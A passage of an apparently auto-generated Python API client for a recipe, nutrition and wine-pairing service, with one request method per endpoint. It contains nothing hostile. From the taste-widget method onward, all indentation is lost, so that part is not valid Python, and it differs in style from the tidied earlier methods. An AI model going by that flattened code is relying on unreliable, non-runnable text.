    return self.get_recipe_information_with_http_info(id, **kwargs)  # noqa: E501
def get_recipe_information_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Recipe Information  # noqa: E501

    Use a recipe id to get full information about a recipe, such as ingredients, nutrition, diet and allergen information, etc.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_information_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the recipe. (required)
    :param bool include_nutrition: Include nutrition data in the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    accepted = ['id', 'include_nutrition',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_recipe_information" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_information`")  # noqa: E501

    # 'include_nutrition' is optional and sent only when provided.
    query_params = []
    if 'include_nutrition' in params:
        query_params.append(('includeNutrition', params['include_nutrition']))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/{id}/information', 'GET',
        {'id': params['id']},
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_recipe_information_bulk(self, ids, **kwargs):  # noqa: E501
    """Get Recipe Information Bulk  # noqa: E501

    Get information about multiple recipes at once. This is equivalent to calling the Get Recipe Information endpoint multiple times, but faster.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_information_bulk(ids, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ids: A comma-separated list of recipe ids. (required)
    :param bool include_nutrition: Include nutrition data to the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_recipe_information_bulk_with_http_info(ids, **kwargs)  # noqa: E501
def get_recipe_information_bulk_with_http_info(self, ids, **kwargs):  # noqa: E501
    """Get Recipe Information Bulk  # noqa: E501

    Get information about multiple recipes at once. This is equivalent to calling the Get Recipe Information endpoint multiple times, but faster.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_information_bulk_with_http_info(ids, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ids: A comma-separated list of recipe ids. (required)
    :param bool include_nutrition: Include nutrition data to the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    accepted = ['ids', 'include_nutrition',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'ids': ids}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_recipe_information_bulk" % name
            )
        params[name] = value
    # 'ids' is required by the API.
    if params.get('ids') is None:
        raise ApiValueError("Missing the required parameter `ids` when calling `get_recipe_information_bulk`")  # noqa: E501

    # 'ids' always goes in the query string; 'include_nutrition' is
    # optional and sent only when provided.
    query_params = [('ids', params['ids'])]  # noqa: E501
    if 'include_nutrition' in params:
        query_params.append(('includeNutrition', params['include_nutrition']))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/informationBulk', 'GET',
        {},
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_recipe_ingredients_by_id(self, id, **kwargs):  # noqa: E501
    """Get Recipe Ingredients by ID  # noqa: E501

    Get a recipe's ingredient list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_ingredients_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_recipe_ingredients_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_recipe_ingredients_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Recipe Ingredients by ID  # noqa: E501

    Get a recipe's ingredient list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_ingredients_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameter plus the common per-request options.
    accepted = ['id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_recipe_ingredients_by_id" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_ingredients_by_id`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/{id}/ingredientWidget.json', 'GET',
        {'id': params['id']},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_recipe_nutrition_widget_by_id(self, id, **kwargs):  # noqa: E501
    """Get Recipe Nutrition Widget by ID  # noqa: E501

    Get a recipe's nutrition widget data.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_nutrition_widget_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_recipe_nutrition_widget_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_recipe_nutrition_widget_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Recipe Nutrition Widget by ID  # noqa: E501

    Get a recipe's nutrition widget data.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_nutrition_widget_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameter plus the common per-request options.
    accepted = ['id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_recipe_nutrition_widget_by_id" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_nutrition_widget_by_id`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/{id}/nutritionWidget.json', 'GET',
        {'id': params['id']},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_recipe_price_breakdown_by_id(self, id, **kwargs):  # noqa: E501
    """Get Recipe Price Breakdown by ID  # noqa: E501

    Get a recipe's price breakdown data.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_price_breakdown_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_recipe_price_breakdown_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_recipe_price_breakdown_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Recipe Price Breakdown by ID  # noqa: E501

    Get a recipe's price breakdown data.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_price_breakdown_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameter plus the common per-request options.
    accepted = ['id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_recipe_price_breakdown_by_id" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_price_breakdown_by_id`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/{id}/priceBreakdownWidget.json', 'GET',
        {'id': params['id']},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_recipe_taste_by_id(self, id, **kwargs): # noqa: E501
"""Get Recipe Taste by ID # noqa: E501
Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_taste_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_taste_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_taste_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_taste_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Taste by ID # noqa: E501
Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_taste_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_taste_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_taste_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/tasteWidget.json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_shopping_list(self, username, hash, **kwargs): # noqa: E501
"""Get Shopping List # noqa: E501
Get the current shopping list for the given user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_shopping_list(username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_shopping_list_with_http_info(username, hash, **kwargs) # noqa: E501
else:
(data) = self.get_shopping_list_with_http_info(username, hash, **kwargs) # noqa: E501
return data
def get_shopping_list_with_http_info(self, username, hash, **kwargs): # noqa: E501
"""Get Shopping List # noqa: E501
Get the current shopping list for the given user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_shopping_list_with_http_info(username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'hash'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_shopping_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `get_shopping_list`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `get_shopping_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/shopping-list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_similar_recipes(self, id, **kwargs): # noqa: E501
"""Get Similar Recipes # noqa: E501
Find recipes which are similar to the given one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_similar_recipes(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the source recipe for which similar recipes should be found. (required)
:param float number: The number of random recipes to be returned (between 1 and 100).
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_similar_recipes_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_similar_recipes_with_http_info(id, **kwargs) # noqa: E501
return data
def get_similar_recipes_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Similar Recipes # noqa: E501
Find recipes which are similar to the given one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_similar_recipes_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the source recipe for which similar recipes should be found. (required)
:param float number: The number of random recipes to be returned (between 1 and 100).
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'number', 'limit_license'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_similar_recipes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_similar_recipes`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'limit_license' in local_var_params:
query_params.append(('limitLicense', local_var_params['limit_license'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/similar', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_wine_description(self, wine, **kwargs): # noqa: E501
"""Get Wine Description # noqa: E501
Get a simple description of a certain wine, e.g. \"malbec\", \"riesling\", or \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_description(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The name of the wine that should be paired, e.g. \"merlot\", \"riesling\", or \"malbec\". (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_wine_description_with_http_info(wine, **kwargs) # noqa: E501
else:
(data) = self.get_wine_description_with_http_info(wine, **kwargs) # noqa: E501
return data
def get_wine_description_with_http_info(self, wine, **kwargs): # noqa: E501
"""Get Wine Description # noqa: E501
Get a simple description of a certain wine, e.g. \"malbec\", \"riesling\", or \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_description_with_http_info(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The name of the wine that should be paired, e.g. \"merlot\", \"riesling\", or \"malbec\". (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['wine'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_wine_description" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'wine' is set
if ('wine' not in local_var_params or
local_var_params['wine'] is None):
raise ApiValueError("Missing the required parameter `wine` when calling `get_wine_description`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'wine' in local_var_params:
query_params.append(('wine', local_var_params['wine'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/description', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_wine_pairing(self, food, **kwargs): # noqa: E501
"""Get Wine Pairing # noqa: E501
Find a wine that goes well with a food. Food can be a dish name (\"steak\"), an ingredient name (\"salmon\"), or a cuisine (\"italian\"). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_pairing(food, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str food: The food to get a pairing for. This can be a dish (\"steak\"), an ingredient (\"salmon\"), or a cuisine (\"italian\"). (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_wine_pairing_with_http_info(food, **kwargs) # noqa: E501
else:
(data) = self.get_wine_pairing_with_http_info(food, **kwargs) # noqa: E501
return data
def get_wine_pairing_with_http_info(self, food, **kwargs): # noqa: E501
"""Get Wine Pairing # noqa: E501
Find a wine that goes well with a food. Food can be a dish name (\"steak\"), an ingredient name (\"salmon\"), or a cuisine (\"italian\"). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_pairing_with_http_info(food, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str food: The food to get a pairing for. This can be a dish (\"steak\"), an ingredient (\"salmon\"), or a cuisine (\"italian\"). (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['food', 'max_price'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_wine_pairing" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'food' is set
if ('food' not in local_var_params or
local_var_params['food'] is None):
raise ApiValueError("Missing the required parameter `food` when calling `get_wine_pairing`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'food' in local_var_params:
query_params.append(('food', local_var_params['food'])) # noqa: E501
if 'max_price' in local_var_params:
query_params.append(('maxPrice', local_var_params['max_price'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/pairing', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_wine_recommendation(self, wine, **kwargs): # noqa: E501
"""Get Wine Recommendation # noqa: E501
Get a specific wine recommendation (concrete product) for a given wine type, e.g. \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_recommendation(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The type of wine to get a specific product recommendation for. (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:param float min_rating: The minimum rating of the recommended wine between 0 and 1. For example, 0.8 equals 4 out of 5 stars.
:param float number: The number of wine recommendations expected (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_wine_recommendation_with_http_info(wine, **kwargs) # noqa: E501
else:
(data) = self.get_wine_recommendation_with_http_info(wine, **kwargs) # noqa: E501
return data
def get_wine_recommendation_with_http_info(self, wine, **kwargs): # noqa: E501
"""Get Wine Recommendation # noqa: E501
Get a specific wine recommendation (concrete product) for a given wine type, e.g. \"merlot\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_wine_recommendation_with_http_info(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The type of wine to get a specific product recommendation for. (required)
:param float max_price: The maximum price for the specific wine recommendation in USD.
:param float min_rating: The minimum rating of the recommended wine between 0 and 1. For example, 0.8 equals 4 out of 5 stars.
:param float number: The number of wine recommendations expected (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['wine', 'max_price', 'min_rating', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_wine_recommendation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'wine' is set
if ('wine' not in local_var_params or
local_var_params['wine'] is None):
raise ApiValueError("Missing the required parameter `wine` when calling `get_wine_recommendation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'wine' in local_var_params:
query_params.append(('wine', local_var_params['wine'])) # noqa: E501
if 'max_price' in local_var_params:
query_params.append(('maxPrice', local_var_params['max_price'])) # noqa: E501
if 'min_rating' in local_var_params:
query_params.append(('minRating', local_var_params['min_rating'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/recommendation', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def guess_nutrition_by_dish_name(self, title, **kwargs): # noqa: E501
"""Guess Nutrition by Dish Name # noqa: E501
Estimate the macronutrients of a dish based on its title. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.guess_nutrition_by_dish_name(title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the dish. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.guess_nutrition_by_dish_name_with_http_info(title, **kwargs) # noqa: E501
else:
(data) = self.guess_nutrition_by_dish_name_with_http_info(title, **kwargs) # noqa: E501
return data
def guess_nutrition_by_dish_name_with_http_info(self, title, **kwargs): # noqa: E501
"""Guess Nutrition by Dish Name # noqa: E501
Estimate the macronutrients of a dish based on its title. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.guess_nutrition_by_dish_name_with_http_info(title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str title: The title of the dish. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['title'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
